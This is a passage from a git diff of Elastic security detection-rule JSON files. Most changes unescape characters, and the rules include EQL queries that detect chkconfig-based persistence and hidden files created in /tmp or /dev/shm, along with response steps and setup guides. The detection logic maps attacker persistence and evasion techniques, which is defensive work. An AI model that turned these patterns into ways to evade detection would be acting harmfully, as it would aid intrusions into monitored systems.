7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n( \n (process.executable : \"/usr/sbin/chkconfig\" and process.args : \"--add\") or\n (process.args : \"*chkconfig\" and process.args : \"--add\")\n)\n", + "references": [ + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b910f25a-2d44-47f2-a873-aabdc0d355e6", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Lightning Framework", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "b910f25a-2d44-47f2-a873-aabdc0d355e6_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json index 71e40cf41d9..4786091852e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_1.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json index 423c4b8d3b3..10dc7db398a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json +++ b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_3.json @@ -5,7 +5,7 @@ ], "description": "This rule uses alert data to determine when multiple alerts in different phases of an attack involving the same host are triggered. Analysts can use this to prioritize triage and response, as these hosts are more likely to be compromised.", "false_positives": [ - "False positives can occur because the rules may be mapped to a few MITRE ATT\u0026CK tactics. Use the attached Timeline to determine which detections were triggered on the host." + "False positives can occur because the rules may be mapped to a few MITRE ATT&CK tactics. Use the attached Timeline to determine which detections were triggered on the host." ], "from": "now-24h", "index": [ @@ -14,7 +14,7 @@ "interval": "1h", "language": "kuery", "license": "Elastic License v2", - "name": "Multiple Alerts in Different ATT\u0026CK Tactics on a Single Host", + "name": "Multiple Alerts in Different ATT&CK Tactics on a Single Host", "query": "signal.rule.name:* and kibana.alert.rule.threat.tactic.id:*\n", "required_fields": [ { diff --git a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json index 29247c906b2..9df39c28e5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/b946c2f7-df06-4c00-a5aa-1f6fbc7bb72c_4.json @@ -5,7 +5,7 @@ ], "description": "This rule uses alert data to determine when multiple alerts in different phases of an attack involving the same host are triggered. Analysts can use this to prioritize triage and response, as these hosts are more likely to be compromised.", "false_positives": [ - "False positives can occur because the rules may be mapped to a few MITRE ATT\u0026CK tactics. Use the attached Timeline to determine which detections were triggered on the host." + "False positives can occur because the rules may be mapped to a few MITRE ATT&CK tactics. Use the attached Timeline to determine which detections were triggered on the host." ], "from": "now-24h", "index": [ @@ -14,7 +14,7 @@ "interval": "1h", "language": "kuery", "license": "Elastic License v2", - "name": "Multiple Alerts in Different ATT\u0026CK Tactics on a Single Host", + "name": "Multiple Alerts in Different ATT&CK Tactics on a Single Host", "query": "signal.rule.name:* and kibana.alert.rule.threat.tactic.id:*\n", "required_fields": [ { diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json index 72aaa467e66..e661c2b0b75 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_105.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json index 1587ba04841..231827cfcf8 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_106.json @@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json index aa78025620d..840eb03ae1a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_107.json @@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json index 1a0b0950224..7fdeea11aef 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_108.json @@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", - "setup": "\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json index 1e8cf48dde8..1ccb3da1962 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_102.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json index 6db7e11bf22..3e68641b10b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_103.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json index 59d1f69d514..d9d3de15f17 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_104.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json index 772de385d3f..ea48c640c66 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_105.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Creation of Hidden Files and Directories via CommandLine", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\nprocess.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\nnot process.name in (\"ls\", \"find\", \"grep\", \"git\")\n", "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json index 578509adbdb..f2c1f1eeb5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_106.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper 